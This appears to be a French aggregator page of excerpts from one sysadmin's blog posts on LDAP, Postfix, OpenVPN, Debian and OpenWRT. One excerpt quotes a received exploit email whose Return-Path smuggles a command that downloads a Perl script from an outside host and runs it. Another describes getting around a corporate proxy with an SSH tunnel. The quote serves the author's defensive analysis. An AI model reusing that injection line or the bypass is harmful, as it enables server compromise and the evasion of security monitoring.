Menu principal

Statut de la page

LDAP: sauvegarde / restauration

Quand on joue avec des bases de données, il n’est pas rare de tout exploser. D’où l’importance de bien sauvegarder et de savoir restaurer. Ici, on travaille avec slapd (OpenLDAP) sous Debian GNU/Linux. La configuration du serveur est stockée sous forme de fichiers ldif dans /etc/ldap/slapd.d. Je parle surtout d’un cas simple avec une seule base. S’il y a plus d’une base, il suffit d’adapter ce qui se fait là après avoir lu ça. Sauvegarde: # slapcat -b cn=config -l /var/backups/ldap/config.ldif # config # slapcat -l /var/backups/ldap/data.ldif # données Restauration: On commence par couper le [...]
Lire la suite
Vus : 1606
Publié par Guillaume Vaillant : 20

Contournement de proxy…

Oui, je sais, c’est pas bien de contourner les systèmes de surveillance sécurité mis en place par une DSI pour faire plaisir au patron… Mais, dès fois, c’est très bloquant, donc on doit contourner. La technique est assez basique et marche assez souvent: on ne peut pas vraiment proxyfier le HTTPS, en général, on se contente de le faire passer dans un tunnel, sans aucune analyse. Du coup, c’est assez facile de se monter un proxy SOCKS local via un tunnel SSH, à condition que le serveur SSH distant (hors du réseau où le proxy nous bloque) écoute sur le port tcp/443 (celui utilisé habituellement par les serveurs HTTPS pour ceux qui ne suivent pas). NB: Si le serveur SSH est Dropbear, il faut vérifier qu’il tourne bien avec [...]
Lire la suite
Vus : 1337
Publié par Guillaume Vaillant : 20

Corriger le “Postfix untrusted TLS certificate”

Avant, sur un serveur où tout fonctionne bien, j’avais tout de même ça qui me pourrissait les logs: Jan 16 09:40:22 MX postfix/smtp[1825]: Untrusted TLS connection established to mx-eu.mail.am0.yahoodns.net[188.125.69.79]:25: TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits) En fait, malgré l’installation du package ca-certificates, Postfix ne sait pas vérifier les signatures: le bundle avec les certificats des principales autorités de certification n’est pas copié dans son chroot. La solution (en considérant que le package ca-certificates est installé): copier le bazar dans le chroot: [root@MX: ~]# mkdir -p -m 0755 /var/spool/postfix/etc/ssl/certs [root@MX: ~]# cp -L /etc/ssl/certs/ca-certificates.crt /var/spool/postfix/etc/ssl/certs ajouter ce [...]
Lire la suite
Vus : 588
Publié par Guillaume Vaillant : 20

postfix, spf, dkim, dmarc avec plusieurs domaines

Après m’être un peu battu, voilà mes notes Cas d’utilisation: { Internet }----[ relai smtp dmz ]----[ serveur de mail réel bien à l'abri ] Du coup, sur le relai en DMZ, niveau SMTP, je gère toute la partie: vérification spf/dkim/dmarc des mails qui arrivent ; signature (dkim) des messages qui partent ; authentification pour ceux qui envoient les mails. Tout ce qui est anti-spam/anti-virus se fait sur la machine réelle. Bien entendu, je gère aussi les mails pour plusieurs domaines. Prérequis/divers un postfix qui marche (c’est à dire: reverse dns correct, pas en mode relai ouvert, et qui sait déjà envoyer/recevoir [...]
Lire la suite
Vus : 847
Publié par Guillaume Vaillant : 20

Permettre la détection d’un disque à chaud

Récemment, j’ai eu une petite mésaventure avec une de mes VM: l’hôte a perdu un datastore stocké sur un SAN. Ça a bien viandé la VM, du coup, j’en ai viré le disque virtuel correspondant (ça n’était pas le disque système) et j’ai rebooté. Quand le SAN est revenu d’entre les morts, j’ai rajouté à chaud ce datastore, mais ça n’a eu aucun impact sur la VM: pas de plantage (ouf), mais pas de nouveau disque. Du coup, j’ai googlé un peu, et je suis tombé sur cet article d’où j’ai tiré cette commande (à lancer en [...]
Lire la suite
Vus : 1732
Publié par Guillaume Vaillant : 20

OpenVPN: log et fail2ban

Récemment, j’ai eu à monter un serveur OpenVPN. Personnellement, quand je monte ce type de services, j’aime bien avoir trois choses: un moyen de bloquer les bourrins qui tentent de brute-forcer le service (en général, fail2ban fait bien le boulot); un moyen d’avoir des logs lisibles rapidement/facilement (logwatch) ; un moyen de ne pas avoir des fichiers de logs de 12km de longs (logrotate). Le problème, c’est que par défaut, ces outils ne gèrent pas ou mal OpenVPN. Cet article n’explique pas comment installer et configurer un serveur VPN, juste comment configurer logrotate, fail2ban et [...]
Lire la suite
Vus : 2891
Publié par Guillaume Vaillant : 20

Install Debian sans les mains (presque)

Donc, une installation de Debian (presque) sans les mains, ça vous paraît impossible? C’est pourtant ce que permet l’installeur Debian (d-i) grâce à sa fonction de preseeding. Personnellement, je m’en sers pour aller vite sur la partie pas drôle de l’installation d’un nouveau serveur: installation et configuration de base (jusqu’à la conf du shell et des outils de base). Prérequi: mon article “Install Debian 100% réseau” Attention: Avec ce qui est décrit là, vous ruinez le disque de la machine que vous réinstallez (on flingue la table de partition – et tout ou partie des données – et on recommence au [...]
Lire la suite
Vus : 1938
Publié par Guillaume Vaillant : 20

exploit exim/dovecot

En regardant mes mails ce matin, je suis tombé sur un email bizarre: pas d’expéditeur, pas de sujet, pas de date, et juste un «x» dans le corps du message. Du coup, j’ai regardé ce qu’il y avait vraiment dedans: Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}radioactivefrog.com/.x/exim.txt``perl${IFS}/tmp/p.pl`@blaat.com> Delivered-To: XXXX@YYYY.ZZZZ Received: by XXXX (Postfix) id DFDE128000; Wed, 19 Jun 2013 00:22:35 +0200 (CEST) Delivered-To: postmaster@localhost Received: from localhost (localhost.localdomain [127.0.0.1]) by XXXX (Postfix) with ESMTP id 88FEE2800E for <postmaster@localhost>; Wed, 19 Jun 2013 00:22:30 +0200 (CEST) X-Virus-Scanned: Debian amavisd-new at XXXX X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Received: from XXXX ([127.0.0.1]) by localhost (XXXX [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id nKiVoAlmfbvy for <postmaster@localhost>; Wed, 19 Jun 2013 00:22:28 +0200 (CEST) Received: from domain.local (newpress.com.br [...]
Lire la suite
Vus : 1765
Publié par Guillaume Vaillant : 20

OpenWRT, Freebox et IPv6

L’autre jour, j’ai décidé de repasser ma Freebox en mode bridge, et de la connecter sur un routeur sur lequel j’aurai complètement la main. Bien entendu, tant qu’à faire, je préfère un avoir un routeur sous Linux, avec accès root et tout J’ai donc acheté un routeur NetGear WNDR3700v2, dont j’ai aussitôt remplacé le firmware par un OpenWRT. La suite de cet article va détailler plusieurs choses: Comment ne pas perdre les services TV de la Freebox (tant [...]
Lire la suite
Vus : 1994
Publié par Guillaume Vaillant : 20

Mode de secours sur OpenWRT

Un jour, j’ai fait une modif dans la conf de mon routeur (NetGear WNDR3700v2) qui tourne sous OpenWRT, j’ai rebooté le bazar, et là, catastrophe, plus moyen d’accéder à la bête… Heureusement, là situation n’est pas totalement désespérée, ils ont tout prévu chez OpenWRT: quand il boote, pendant un cours instant, le routeur a l’IP par défaut 192.168.1.1/24 et un serveur telnet qui écoute sur cette IP. La procédure détaillée pour accéder à ce telnet et ce système minimal est disponible en anglais  [...]
Lire la suite
Vus : 1821
Publié par Guillaume Vaillant : 20
Powered by BilboPlanet